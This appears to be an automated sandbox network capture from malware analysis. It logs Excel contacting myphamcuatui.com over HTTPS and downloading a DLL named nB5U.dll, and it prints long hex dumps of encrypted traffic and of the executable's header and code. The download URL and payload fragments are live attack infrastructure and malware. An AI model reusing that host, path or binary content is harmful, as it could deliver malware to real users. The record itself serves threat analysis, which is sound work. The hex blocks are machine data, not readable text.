                                                                            2022-05-23 16:59:08 UTC704INData Raw: b1 ba bb a1 c6 4c 16 7a 63 7b c2 be 7e b3 af 00 99 24 7a d5 33 77 56 f7 21 22 52 24 f1 72 f3 3b 67 48 56 11 a0 b3 53 23 42 d3 7b 20 69 a3 67 1a eb 25 20 9c 60 78 74 b9 1c 53 db 37 8e b1 32 45 fb 5a 56 72 b7 76 61 d5 6b 30 43 91 33 49 66 d1 45 5b 1e 36 64 32 9e 06 72 2e c5 39 77 06 0a 20 5b fb 73 13 c8 27 16 f1 74 66 b8 e0 1f 70 4c 70 d2 f6 a3 77 41 c2 eb c8 72 f7 3a 75 5d 20 1b 74 5d 76 51 60 bf 75 5b e8 4f 69 6e 52 b1 06 4e 02 d2 7a cc 84 17 86 6d e4 89 6d ce 4d c6 0a d4 30 18 d3 73 c4 b7 41 5e 61 eb 25 c4 d7 75 3a 36 f5 1c b3 56 99 9a 76 b6 08 bf 0a f3 1f c6 35 c8 27 c6 72 d1 df 5c a6 2f a8 4e ec 5b 30 e5 77 a1 f2 85 72 72 f7 02 95 d5 e6 3f 72 f1 76 59 09 f4 06 43 db 13 71 9d b1 1b b9 ee 7d f5 fd e3 92 bb 71 b8 b7 9e 6b c6 4d 22 f9 7b 23 be b3 1d fa 92
                                                                            Data Ascii: Lzc{~$z3wV!"R$r;gHVS#B{ ig% `xtS72EZVrvak0C3IfE[6d2r.9w [s'tfpLpwAr:u] t]vQ`u[OinRNzmmM0sA^a%u:6Vv5'r\/N[0wrr?rvYCq}qkM"{#
                                                                            2022-05-23 16:59:08 UTC712INData Raw: ef 77 49 ca 17 8e b5 33 67 b0 92 ab 32 f3 7b 23 4b 3e 29 b2 c8 15 4e a0 8a 57 b9 36 46 b1 21 22 3b 0a 52 72 f3 03 67 e7 ab 20 c1 f9 73 23 c0 17 c2 f7 06 40 72 b3 82 50 b1 36 46 e0 b3 cd a6 c2 27 62 f6 02 4f d8 c4 45 22 fb 73 c3 8e 17 16 63 b1 ee 5e d9 01 1c 94 74 dd 7d 44 c5 b8 92 b8 fb 27 56 b6 00 6f 0b b1 07 16 65 8e 17 d2 b0 cb 4f 5e a0 0f b4 39 f2 23 d4 60 32 48 7c 95 37 6a b3 09 a3 4f c1 57 6a 32 b8 0c 4a bb 3c 83 e8 57 aa 57 dd 33 ba df 7d 7c b3 2c 5b cf 71 af 7b b0 28 a7 d3 f5 e5 36 b2 3c ba 80 30 1c 84 df 14 82 69 3c bc 82 f7 21 22 b6 4a 8c 72 f9 3b 67 9a ae c1 d8 76 8e 7e d8 9d 8c b9 16 40 9f 04 7a 5e b1 36 46 3a 08 32 59 c2 27 62 0b 9b 77 87 88 45 d2 b2 80 5b 49 d3 7b d0 f3 61 bb fb eb 25 d0 ee 71 d6 fe f5 1c 6b 77 db 3d 76 fc 20 67 f7 d3 59 fc
                                                                            Data Ascii: wI3g2{#K>)NW6F!";Rrg s#@rP6F'bOE"sc^t}D'VoeO^9#`2H|7jOWj2J<WW3}|,[q{(6<0i<!"Jr;gv~@z^6F:2Y'bwE[I{a%qkw=v gY
                                                                            2022-05-23 16:59:08 UTC720INData Raw: 71 47 52 72 94 c1 82 e4 8e a5 1a 76 36 33 41 d9 bb 18 47 50 5e ec 7e d9 f1 91 52 b9 f1 1a 5d 43 52 f3 c7 5e 73 6d 4f 35 17 16 40 b8 dc 7a 32 30 43 db d3 41 6e 50 30 9b aa 96 9b cd 18 c8 94 3a f3 b2 6f 68 4f 00 73 2d 77 6d 16 0c 6d 6d 80 9c 1a e8 26 74 10 37 df 74 40 2a 0a 0b d1 9e 42 3e fc 68 a9 82 33 72 f1 77 6d 72 e4 fb 48 50 d5 b8 ad 14 14 57 a1 63 68 32 11 c6 92 07 3b b1 33 49 1f 33 20 65 36 e2 2d 76 66 b1 37 74 0e 7d 52 79 30 b4 12 14 3c 3f 39 ea 52 b3 1e 52 2f 68 ce 74 16 2a ef 5d 4f 52 bd 74 67 08 d5 25 4e 00 71 ca 13 a4 b5 26 18 fb 09 b3 08 d9 9f 14 1d 00 32 3a bf 36 cf d0 37 30 07 db 1a 45 0a 63 e2 f8 9d 78 e7 f6 69 18 1a 8d 92 ba 3b e6 93 49 bb 29 3e 7a c0 39 26 79 ca 23 46 36 22 d3 dc 13 dd b4 40 8a 59 43 52 3a f9 da 53 fd 4f 00 32 3b bd eb c0
                                                                            Data Ascii: qGRrv63AGP^~R]CR^smO5@z20CAnP0:ohOs-wmmm&t7t@*B>h3rwmrHPWch2;3I3 e6-vf7t}Ry0<?9RR/ht*]ORtg%Nq&2:670Ecxi;I)>z9&y#F6"@YCR:SO2;
                                                                            2022-05-23 16:59:08 UTC728INData Raw: 54 f3 37 56 7c 3b 4f 00 b3 07 16 a4 c6 50 36 f7 06 bc 52 7b 00 50 b1 36 ba 99 cb cd a6 c2 27 9e a4 1a 1a 6d c4 45 de fb 72 17 71 d9 73 10 07 db 13 81 2e db 75 9b 1e b9 18 16 69 ca 16 56 5a 3e fa 28 bf 48 bb 36 12 13 a1 6d 49 30 43 97 1b 85 4a e0 8a 73 d7 75 80 77 2c 43 52 f9 aa 3e fc ba 24 4d d6 3c bf 7e ad 93 5b d4 4e d1 2b 85 9b 68 39 73 91 75 84 bd 27 9d 52 f3 37 96 84 2d 4f 00 b3 37 d6 9e a6 ad c9 f1 26 b0 58 e0 1f b0 40 69 fa 07 a3 77 79 30 68 ef 72 b7 1a 4d 43 6b 7f 52 4d ba 04 72 f7 5d 63 5a df 14 4a 1a 4a 7f 56 f7 21 da cb 58 61 72 f3 33 9f 5e aa 00 32 f3 7b db dd 4a e9 2f c2 25 b6 86 34 ae 2f f8 13 d8 20 b9 14 63 16 f9 37 96 fc 20 ab 89 76 56 16 db 7b a1 36 30 0f dd 02 45 0a db f3 3a dd 6b 74 7b d2 30 4a 3b f9 0d 5f 24 c4 e3 6f b1 fa ff c0 06 12
                                                                            Data Ascii: T7V|;OP6R{P6'mErqs.uiVZ>(H6mI0CJsuw,CR>$M<~[N+h9su'R7-O7&X@iwy0hrMCkRMr]cZJJV!Xar3^2{J/%4/ c7 vV{60E:kt{0J;_$o
                                                                            2022-05-23 16:59:08 UTC736INData Raw: ba 75 77 6d 81 2a cd 8d b7 86 81 51 36 30 d0 e1 fb 61 ad d5 80 70 56 30 21 b9 fe 43 93 d7 c2 75 77 6d 43 81 bf c2 35 33 49 62 d9 08 d6 d1 eb d1 69 50 30 51 a2 8b 99 b9 dc f3 51 72 72 3a fc 68 0f 41 33 72 bf 77 6d 1a bd b5 8b 53 5e 61 2e db bd b3 55 30 64 b9 0d 67 02 fb 36 52 37 24 c2 88 1a 70 36 33 01 df 72 14 33 19 dd a1 62 18 b9 3f 72 08 ef bf e1 40 52 72 3a ff 33 49 7f 48 bb 2e 12 1b a1 13 3c 30 43 97 db a1 69 50 30 7b 81 47 64 b3 dc 83 51 72 72 bd ca 92 b0 b8 fd b9 14 0d c2 df f6 33 43 50 a9 80 41 9a e1 9a 55 fa a5 db 5f ca df b2 71 76 77 06 ca c0 31 72 36 7d c0 d7 f6 33 43 50 e6 c4 2b 4a 94 f2 e3 f0 67 32 59 a1 da 26 72 b1 f2 dd 4c 00 32 53 79 d0 49 d9 bb 80 40 50 5e 96 8b 7b fa a2 bf 33 ae 7a d2 90 93 9b 77 ff fa dd 4c 00 32 b3 93 83 4a 52 36 3e 28
                                                                            Data Ascii: uwm*Q60apV0!CuwmC53IbiP0QQrr:hA3rwmS^a.U0dg6R7$p63r3b?r@Rr:3IH.<0CiP0{GdQrr3CPAU_qvw1r6}3CP+Jg2Y&rL2SyI@P^{3zwL2JR6>(
                                                                            2022-05-23 16:59:08 UTC744INData Raw: 32 86 73 1b 96 72 bd 7e a2 a5 d7 1b 89 81 b7 62 a0 91 d9 76 df 7d 8f b3 2c a8 97 e6 7b 76 fc 28 a4 8b 67 0d bd 7e ae 16 bd 7e 03 d9 1a 45 4a b8 f0 25 a8 cf dc c9 c0 4d 52 9b 2e 88 88 92 07 8b fc 9a f8 fa b6 ad bf 73 4b e8 0b 26 61 50 d9 34 a8 cf 9b f5 1c 3c ed c8 81 76 3b e0 02 07 7a f9 e5 b8 0c 2d f7 d0 46 d9 1b 1e eb 15 4f 61 c7 30 64 b3 1c 3c 77 60 72 76 f6 18 30 94 d9 00 28 f4 0c b5 70 c2 b1 50 df 24 8d 14 ee 73 56 b1 21 d5 df ee ad 8d f3 03 90 30 10 fb 32 36 bd 76 ae d9 7b 4f ab 19 51 9e 95 e8 6d 26 5f 30 8d db a4 bc ad b5 37 9d 4b 13 12 00 7e ff 78 13 01 df 7b 37 c2 1d b5 77 20 01 76 f2 23 db 06 9c 04 05 95 37 0d 50 37 fd 4f 81 77 0d 87 17 49 52 f7 5d 3c 59 df 14 15 c7 83 70 56 74 ef 77 26 c8 07 99 9a fb 07 93 b0 b8 fc 19 34 33 74 9c 5d 32 43 5f db
                                                                            Data Ascii: 2sr~bv},{v(g~~EJ%MR.sK&aP4<v;z-FOa0d<w`rv0(pP$sV!026v{OQm&_07K~x{7w v#7P7OwIR]<YpVtw&43t]2C_
                                                                            2022-05-23 16:59:08 UTC752INData Raw: 4f 00 32 aa d1 36 49 95 b3 b8 43 50 5e f5 42 f2 30 f8 db b8 64 32 59 b4 b3 59 b8 a7 9e 6e 85 c1 db 77 bf be c1 52 36 30 c2 d5 d6 61 6a 50 76 c2 56 30 e5 87 d1 43 52 72 cb ce 7f 6d c4 85 ba 72 36 33 c2 d7 b6 30 43 50 b6 ba 15 50 30 c8 f9 11 61 32 b0 45 bf 8d 8d b1 f2 e5 4f 00 32 d1 cc fe 49 39 b3 b8 43 50 5e 2c 26 dd 75 63 df b5 ec 32 59 43 d3 ff fa 76 77 6d cc 8f 5f 8c b7 86 c1 52 36 30 03 05 a3 9e ad d5 b0 73 56 30 28 bc 45 43 d9 ff f2 76 77 6d f7 9d b0 e5 65 c4 a8 93 dc 35 ca c5 de 61 6a 50 b1 c6 d6 30 64 32 bf 68 5d 72 f9 e3 f7 6d 4f 00 b9 ff be 33 49 52 de 43 31 50 5e da f9 08 36 73 bf a2 88 cd a6 84 d7 fa 72 76 77 aa 17 d1 32 f9 bb bb 49 52 36 88 06 70 89 25 9d b1 f1 99 53 b9 f1 ba 59 43 52 f3 c7 fe 77 6d 4f 3d c3 72 36 b8 cc da 36 30 43 b8 76 ef 6a
                                                                            Data Ascii: O26ICP^B0d2YYnwR60ajPvV0CRrmr630CPP0a2EO2I9CP^,&uc2YCvwm_R60sV0(ECvwme5ajP0d2h]rmO3IRC1P^6srvw2IR6p%SYCRwmO=r660Cvj
                                                                            2022-05-23 16:59:08 UTC760INData Raw: f3 1e 12 73 4f d3 42 14 03 79 2e 6a 6a 97 74 57 36 b8 0d 40 59 82 36 56 12 73 b6 09 6b 60 3d f3 42 17 29 6d 2f b8 db db 1a 45 0a db 74 57 16 d8 60 81 a6 bc 1a fb 77 c7 94 6d 4f 4c b9 bc 7a b8 8a 61 e4 78 c8 9f 16 ea 36 74 58 3b dd 44 40 42 11 c0 96 22 2d 3e 88 8d 07 8b f6 3a bf 6b 41 1a bf 40 53 18 d7 19 72 05 78 fe 3e 81 2c b3 b5 e3 52 72 72 3e fc 10 30 49 b9 82 7e ba 31 d2 bd 75 34 d9 1a 45 4a b8 4e 37 a9 cf 57 e9 9e 06 49 ce 34 7d 77 d5 ff e7 34 72 0b 91 d4 53 36 3f c7 ff 5c 61 6a 6d a1 54 50 30 6b b6 0b 42 52 72 4f c6 90 6b 4f 0f b6 4f 37 33 49 6f 79 df 4d 50 51 e4 b4 52 30 73 91 75 4b 0a bd 84 52 3a ff 23 4c ec 3a 2f 1d b8 84 11 c8 27 19 27 6d 25 7c a6 2f 4f eb 16 89 30 e5 47 46 c5 54 c6 50 b7 12 72 43 81 47 6d 37 e3 7c e4 f1 75 64 24 53 dc 6a 3b 75
                                                                            Data Ascii: sOBy.jjtW6@Y6Vsk`=B)m/EtW`wmOLzax6tX;D@B"->:kA@Srx>,Rrr>0I~1u4EJN7WI4}w4rS6?\ajmTP0kBRrOkOO73IoyMPQR0suKR:#L:/''m%|/O0GFTPrCGm7|ud$Sj;u
                                                                            2022-05-23 16:59:08 UTC768INData Raw: 5d 1b e6 93 dc 36 ca 05 29 e0 1f 27 de d9 53 30 a3 77 36 7a ea d2 72 fd 3a 02 b8 e1 8a 0f 3a fd 8e 79 fc e1 aa 53 94 a0 83 55 b9 3e 39 b1 11 5d 57 1f 5c 72 b5 33 10 00 f2 09 32 f9 7b 54 be b3 7e bd 06 73 9f 8b 6f 18 b9 37 72 10 ed 67 3e c2 27 15 31 ee 72 6d 0b 8b 7f 15 bd 66 26 d9 7b 47 ab 6b ba 9e 95 a7 e8 68 96 15 82 19 a6 bc 57 a8 f6 7c 77 84 4d ff cd 8d f1 76 2e a3 18 fb 43 d1 1b 06 9d fa 30 73 d7 7d 03 6c 39 c7 cd f3 07 11 b9 99 86 9f b9 37 51 db 4d 9f c8 cf 84 15 49 8a 4a ab 30 f2 13 27 52 22 59 43 1a f9 aa b1 33 49 2f 10 32 72 36 b2 04 45 09 bf 83 46 12 ec 2d 60 b1 06 41 4a 5b c5 4f 84 17 0d 4b 31 79 6d ce 4d 4d 88 0b 09 a4 39 73 4f 04 d9 1b 1e eb 25 4f 12 89 6a a8 f5 1c 34 c2 bc 62 76 b6 08 38 07 b3 07 41 0e a6 44 08 5b 06 27 60 e8 2f 27 b1 06 21
                                                                            Data Ascii: ]6)'S0w6zr::ySU>9]W\r32{T~so7rg>'1rmf&{GkhW|wMv.C0s}l97QMIJ0'R"YC3I/2r6EF-`AJ[OK1ymMM9sO%Oj4bv8AD['`/'!
                                                                            2022-05-23 16:59:08 UTC776INData Raw: b0 e8 57 02 32 72 65 d1 36 52 5d b5 5b 52 5e 61 7c d9 b5 6b 54 30 64 59 dc 5b 50 72 72 2f fe e8 57 02 32 72 b7 86 51 50 36 30 95 56 43 b3 e1 d5 28 71 56 30 5d 71 5d 4c d7 d1 72 76 77 aa ca 28 30 72 36 a7 5d 79 36 88 28 1c fa 66 27 db f4 f8 db 18 66 32 59 b4 b3 a3 98 ff e2 45 4d 00 32 3a bb 60 45 d3 83 18 41 50 5e 56 6f 5e 30 b4 d3 28 66 32 59 9f 74 3a 72 1d f2 75 4d 00 32 5b bf b6 51 50 36 30 c2 d5 46 63 6a 50 b8 d8 56 30 e5 b7 41 41 52 72 04 1d 77 6d ce b5 2a 70 36 33 65 49 b7 3b 84 d5 7e 63 6a 50 36 29 51 30 e5 b7 79 41 52 72 c5 41 88 92 ce b5 12 70 36 33 28 2b 39 30 c8 d5 7e 63 6a 50 74 f8 db 28 66 32 59 c8 df 5a 70 76 77 e4 0b 24 12 9a 1a 73 b7 ad b3 f0 37 5f 1a 58 41 24 20 f8 55 78 67 ea b0 52 ad 8d 8d 37 c9 6c 4f 00 32 37 b3 c5 46 d6 85 30 43 50 99
                                                                            Data Ascii: W2re6R][R^a|kT0dY[Prr/W2rQP60VC(qV0]q]Lrvw(0r6]y6(f'f2YEM2:`EAP^Vo^0(f2Yt:ruM2[QP60FcjPV0AARrwm*p63eI;~cjP6)Q0yARrAp63(+90~cjPt(f2YZpvw$s7_XA$ UxgR7lO27F0CP
                                                                            2022-05-23 16:59:08 UTC784INData Raw: 4f 41 8b 76 36 33 49 1e bd f3 0b db 8b 29 e1 9f 78 fa 22 14 44 cd 89 0f df 2e 56 06 3e e6 14 18 7b f9 5d 13 00 d9 45 18 0a db bd 3e a9 9c fc bf 1e b9 38 16 79 ca 06 56 62 ff 3b 49 47 55 7a f9 da 7b ca be 06 03 83 97 1b 91 8f c4 3f 73 91 75 90 f9 ae 46 52 fb 37 8e cf 51 69 06 32 4f 63 70 4a 52 39 bf 5c 57 5e 61 65 d4 2a 75 56 30 59 73 e1 43 52 7d f6 ad 73 6d 4f 3d 7e 4d 37 33 46 d6 8e 33 43 50 63 bc 12 51 30 7c d2 a1 66 32 59 7e f8 d5 73 76 78 e9 1e 01 32 72 0b c9 a8 50 36 3f c6 b4 54 61 6a 97 75 63 b5 3d 5e 32 d8 0e 42 b0 86 3a 94 e6 02 10 8a 37 16 e4 0d a5 d7 f1 a9 55 d7 34 7a d1 45 63 15 ee 85 33 9e 06 4a 86 15 00 77 ec 0a 18 69 4a c9 cc c8 17 2e d5 f4 af a1 e0 1f 48 f8 5e 10 8a e5 47 41 09 62 42 c8 fd 32 75 c4 45 22 9a 2e dd b7 ad f1 75 53 8a c7 68 6a
                                                                            Data Ascii: OAv63I)x"D.V>{]E>8yVb;IGUz{?suFR7Qi2OcpJR9\W^ae*uV0YsCR}smO=~M73F3CPcQ0|f2Y~svx2rP6?Tajuc=^2B:7U4zEc3JwiJ.H^GAbB2uE".uShj
                                                                            2022-05-23 16:59:08 UTC792INData Raw: 16 32 bd 67 6d 16 bf 74 67 70 b6 18 a3 ae cf b4 12 14 24 85 ea a2 52 ca d1 42 49 5f c4 4c 16 32 c1 d2 62 98 e7 d9 40 9a 9f 88 6c d9 7c 57 16 b1 20 16 19 8e ae 72 72 f7 03 49 0f 8c 2a 71 36 b8 0d 76 76 f7 07 74 1e 7e 4d 78 30 f8 1a 14 24 7a 5a b3 ea 7b b9 4b fa 25 c6 74 16 42 c1 d2 88 b8 33 b9 17 74 1e a0 06 74 70 7c d7 44 40 72 56 88 57 72 b5 32 53 21 c0 96 d7 72 5d 77 6d 1e 39 b9 07 74 12 d9 25 bc f4 3d 97 54 40 7e 54 c2 26 56 3e e5 1d 0e 9b 81 46 56 7a 41 97 7f 98 f7 07 74 1a 0f 7f 3c 30 f2 12 14 20 29 e1 bc ad f3 36 52 33 e3 4e ff cd f9 7a 17 0d a5 d7 f1 a9 53 d7 35 4e 14 b1 07 72 74 a4 ce 52 43 95 36 56 3e 03 85 39 00 b3 36 12 7b 2d a9 36 30 c2 24 7a 29 d2 3d 41 73 1e bb 21 b5 11 ca 16 56 5a fd 33 49 07 44 b9 36 12 77 c2 06 12 7c 07 db 13 ee e1 1c 14
                                                                            Data Ascii: 2gmtgp$RBI_L2b@l|W rrI*q6vvt~Mx0$zZ{K%tB3ttp|D@rVWr2S!r]wm9t%=T@~T&V>FVzAt<0 )6R3NzS5NrtRC6V>96{-60$z)=As!VZ3ID6w|
                                                                            2022-05-23 16:59:08 UTC800INData Raw: bf 7e cd d3 43 b4 70 74 52 61 e1 15 b4 37 dd 7d f0 76 d2 c6 da 72 72 76 fc 20 cf 89 76 56 16 db 91 5b c9 cf 84 15 9e 09 6a 50 30 b4 d3 b8 64 32 59 68 a3 9c 72 fd fa e5 4f 00 32 cd 79 df 8d 1c bd f7 b4 b1 9f 8b 68 d9 a5 fb 56 30 64 f3 fc cb 52 72 72 79 f6 d8 c7 00 32 72 aa 9b e2 62 bd b5 cb 50 5e 61 82 83 b2 8c a9 78 ed 77 89 84 d7 fa 72 76 77 85 c6 fd 32 19 b3 bb 49 52 36 06 ca d5 d6 61 6a 50 88 70 cf 24 4b b3 dc cb 52 72 72 67 88 92 b0 c1 9f fa 36 33 49 5c b7 85 cb 50 5e 61 86 81 30 73 91 75 c0 3b c9 47 52 f9 3f d2 80 8c f7 6d f3 64 5a f2 a3 56 bf 65 e7 d1 2b c5 26 5d 30 73 91 75 e8 8b 3b d6 52 b3 17 fa 7c ec 3a 8c 47 26 27 98 8e 17 b6 6d 34 78 5e e0 2f d0 ef 1f a9 cf ef 7f d9 b4 b3 f9 b5 5d bd bc a6 03 f8 b3 df 36 c0 1f b6 b1 06 d0 62 e9 95 af b1 06 d6
                                                                            Data Ascii: ~CptRa7}vrrv vV[jP0d2YhrO2yhV0dRrry2rbP^axwrvw2IR6ajPp$KRrrg63I\P^a0su;GR?mdZVe+&]0su;R|:G&'m4x^/]6b
                                                                            2022-05-23 16:59:09 UTC808INData Raw: c0 16 12 10 ab ab 9a 9f 95 18 b3 b7 26 6d a7 fe 19 10 1a f1 9e 26 3f e6 d3 24 b2 72 36 33 01 db 6a 14 63 b8 b6 e5 94 af 03 b3 df 74 40 72 11 c8 57 05 56 76 77 aa 0b 24 0a d6 9e 3f 49 95 72 14 7f 0b 88 66 6a 18 b5 b3 23 4a a3 76 7d 73 80 1d 1c 76 36 d4 5f 03 18 29 b7 77 6d 62 18 23 43 50 df 25 4e 60 2d 64 a9 cf ef 76 7d 73 df 7e b2 ce ac 26 27 2f bb 3e 12 03 c8 26 12 00 5b fe 85 62 ad 14 14 47 b3 46 5d 32 1d c8 16 56 46 37 80 8d 0b 2b f0 33 e7 db 0d 51 f4 71 82 b8 5b 25 e3 14 14 47 17 88 3f f3 23 ec d3 06 56 42 37 9d 45 00 b9 36 12 07 c2 16 12 00 ab d3 ac 9f 95 18 b9 76 be 13 64 32 11 c8 99 3a f1 b2 27 36 07 ff d2 be 7e b0 a5 4a f1 74 67 70 26 f1 6b 50 f7 37 72 10 54 4f d6 43 1e f9 b3 1d 33 49 6f 13 bb 36 12 13 c8 1e 12 10 ab e7 15 df ab 3c 14 53 55 b1 10
                                                                            Data Ascii: &m&?$r63jct@rWVvw$?Irfj#Jv}sv6_)wmb#CP%N`-dv}s~&'/>&[bGF]2VF7+3Qq[%G?#VB7E6vd2:'6~Jtgp&kP7rTOC3Io6<SU
                                                                            2022-05-23 16:59:09 UTC816INData Raw: 49 f9 42 50 de 86 68 50 b0 ba 57 30 7c f8 58 43 72 93 70 76 6f a7 4e 00 88 b8 37 33 89 b7 34 30 ff 9a 5f 61 33 9c 31 73 4e d6 66 32 05 8f 53 72 33 bb 76 6d 4f e0 30 72 72 fe 48 52 27 e0 42 50 6a 83 68 50 24 a3 57 30 41 e3 58 43 c2 95 70 76 5f bc 4e 00 22 a7 37 33 e9 b5 34 30 53 85 5f 61 37 8a 31 73 ea d7 66 32 39 99 53 72 8e ad 76 6d 83 e7 30 72 ca e8 48 52 30 c9 42 50 be 86 68 50 38 8a 57 30 bb 30 5b 43 a6 95 70 76 97 6f 4d 00 f0 75 34 33 41 ba 34 30 87 57 5c 61 e8 58 32 73 8e d0 66 32 dd 4b 50 72 f2 7f 75 6d af e0 30 72 b6 3a 4b 52 02 3a 41 50 e2 80 68 50 04 79 54 30 13 3c 5b 43 72 9a 70 76 0f 63 4d 00 76 7d 34 33 71 ba 34 30 07 5f 5c 61 f4 42 32 73 62 d2 66 32 f9 51 50 72 f9 65 75 6d 4f e0 30 72 ba 20 4b 52 0c 24 41 50 e2 80 68 50 0c 67 54 30 d4 27 5b
                                                                            Data Ascii: IBPhPW0|XCrpvoN7340_a31sNf2Sr3vmO0rrHR'BPjhP$W0AXCpv_N"7340S_a71sf29Srvm0rHR0BPhP8W00[CpvoMu43A40W\aX2sf2KPrum0r:KR:APhPyT0<[CrpvcMv}43q40_\aB2sbf2QPreumO0r KR$APhPgT0'[
                                                                            2022-05-23 16:59:09 UTC824INData Raw: 20 a0 28 a0 30 a0 38 a0 40 a0 48 a0 50 a0 58 a0 60 a0 68 a0 70 a0 78 a0 80 a0 88 a0 90 a0 98 a0 a0 a0 a8 a0 b0 a0 b8 a0 c0 a0 c8 a0 d0 a0 d8 a0 e0 a0 e8 a0 f0 a0 f8 a0 00 a1 08 a1 10 a1 18 a1 20 a1 28 a1 30 a1 38 a1 40 a1 48 a1 50 a1 58 a1 60 a1 68 a1 70 a1 78 a1 80 a1 88 a1 90 a1 98 a1 a0 a1 a8 a1 c0 a1 e0 a1 08 a2 30 a2 50 a2 70 a2 98 a2 b8 a2 e0 a2 e8 a2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                            Data Ascii: (08@HPX`hpx (08@HPX`hpx0Pp


                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                            1192.168.2.2249175103.1.238.211443C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                            TimestampkBytes transferredDirectionData
                                                                            2022-05-23 16:59:16 UTC831OUTGET /assets/OPVeVSpO/ HTTP/1.1
                                                                            Accept: */*
                                                                            UA-CPU: AMD64
                                                                            Accept-Encoding: gzip, deflate
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                            Host: myphamcuatui.com
                                                                            Connection: Keep-Alive
                                                                            2022-05-23 16:59:17 UTC831INHTTP/1.1 200 OK
                                                                            Date: Mon, 23 May 2022 14:36:46 GMT
                                                                            Server: Apache/2
                                                                            X-Powered-By: PHP/7.0.31
                                                                            Set-Cookie: 628b9bfe10029=1653316606; expires=Mon, 23-May-2022 14:37:46 GMT; Max-Age=60; path=/
                                                                            Cache-Control: no-cache, must-revalidate
                                                                            Pragma: no-cache
                                                                            Last-Modified: Mon, 23 May 2022 14:36:46 GMT
                                                                            Expires: Mon, 23 May 2022 14:36:46 GMT
                                                                            Content-Disposition: attachment; filename="nB5U.dll"
                                                                            Content-Transfer-Encoding: binary
                                                                            Content-Length: 850432
                                                                            Vary: Accept-Encoding,User-Agent
                                                                            Connection: close
                                                                            Content-Type: application/x-msdownload
                                                                            2022-05-23 16:59:17 UTC832INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 f1 cf 78 03 b5 ae 16 50 b5 ae 16 50 b5 ae 16 50 c3 33 7b 50 b2 ae 16 50 c3 33 6d 50 a2 ae 16 50 b5 ae 17 50 b4 ac 16 50 92 68 6b 50 bd ae 16 50 92 68 7b 50 32 ae 16 50 92 68 78 50 37 ae 16 50 92 68 64 50 b3 ae 16 50 92 68 6c 50 b4 ae 16 50 92 68 6a 50 b4 ae 16 50 92 68 6e 50 b4 ae 16 50 52 69 63 68 b5 ae 16 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$xPPP3{PP3mPPPPhkPPh{P2PhxP7PhdPPhlPPhjPPhnPPRichP
                                                                            2022-05-23 16:59:17 UTC848INData Raw: c6 84 24 7f 05 00 00 81 c6 84 24 80 05 00 00 a7 c6 84 24 81 05 00 00 25 c6 84 24 82 05 00 00 6c c6 84 24 83 05 00 00 c8 c6 84 24 84 05 00 00 7e c6 84 24 85 05 00 00 49 c6 84 24 86 05 00 00 c7 c6 84 24 87 05 00 00 3c c6 84 24 88 05 00 00 cc c6 84 24 89 05 00 00 76 c6 84 24 8a 05 00 00 33 c6 84 24 8b 05 00 00 30 c6 84 24 8c 05 00 00 43 c6 84 24 8d 05 00 00 18 c6 84 24 8e 05 00 00 d5 c6 84 24 8f 05 00 00 2e c6 84 24 90 05 00 00 5a c6 84 24 91 05 00 00 11 c6 84 24 92 05 00 00 89 c6 84 24 93 05 00 00 77 c6 84 24 94 05 00 00 56 c6 84 24 95 05 00 00 30 c6 84 24 96 05 00 00 64 c6 84 24 97 05 00 00 73 c6 84 24 98 05 00 00 e1 c6 84 24 99 05 00 00 43 c6 84 24 9a 05 00 00 62 c6 84 24 9b 05 00 00 72 c6 84 24 9c 05 00 00 72 c6 84 24 9d 05 00 00 37 c6 84 24 9e 05 00 00
                                                                            Data Ascii: $$$%$l$$~$I$$<$$v$3$0$C$$$.$Z$$$w$V$0$d$s$$C$b$r$r$7$
                                                                            2022-05-23 16:59:17 UTC864INData Raw: 74 bf 04 00 48 8b 4f 40 45 33 c9 45 33 c0 ba 02 10 00 00 ff 15 5f bf 04 00 48 8b c8 e8 5b 28 00 00 48 8b 58 08 e8 52 19 00 00 45 33 c9 48 8b 88 c8 00 00 00 44 8b c6 48 8b d3 48 8b 09 e8 0e f7 ff ff ba 80 00 00 00 48 89 87 20 01 00 00 48 8b 4d 40 44 8d 42 81 4c 8b c8 ff 15 19 bf 04 00 48 8b 5c 24 30 48 8b 7c 24 48 48 8b 74 24 40 48 8b 6c 24 38 48 83 c4 28 c3 cc cc cc cc cc cc cc cc 40 53 48 83 ec 20 48 8b d9 e8 92 d3 00 00 24 03 3c 02 74 13 45 33 c9 48 8b cb 41 8d 51 03 45 8d 41 02 e8 e1 d3 00 00 48 83 c4 20 5b c3 cc cc cc 40 53 48 83 ec 20 48 8b d9 e8 62 d3 00 00 a8 03 74 12 45 33 c9 45 33 c0 48 8b cb 41 8d 51 03 e8 b4 d3 00 00 48 83 c4 20 5b c3 cc cc cc cc cc cc 40 53 48 83 ec 20 48 8b d9 e8 32 d3 00 00 83 e0 03 3c 03 74 13 ba 03 00 00 00 45 33 c9 48 8b
                                                                            Data Ascii: tHO@E3E3_H[(HXRE3HDHHH HM@DBLH\$0H|$HHt$@Hl$8H(@SH H$<tE3HAQEAH [@SH HbtE3E3HAQH [@SH H2<tE3H
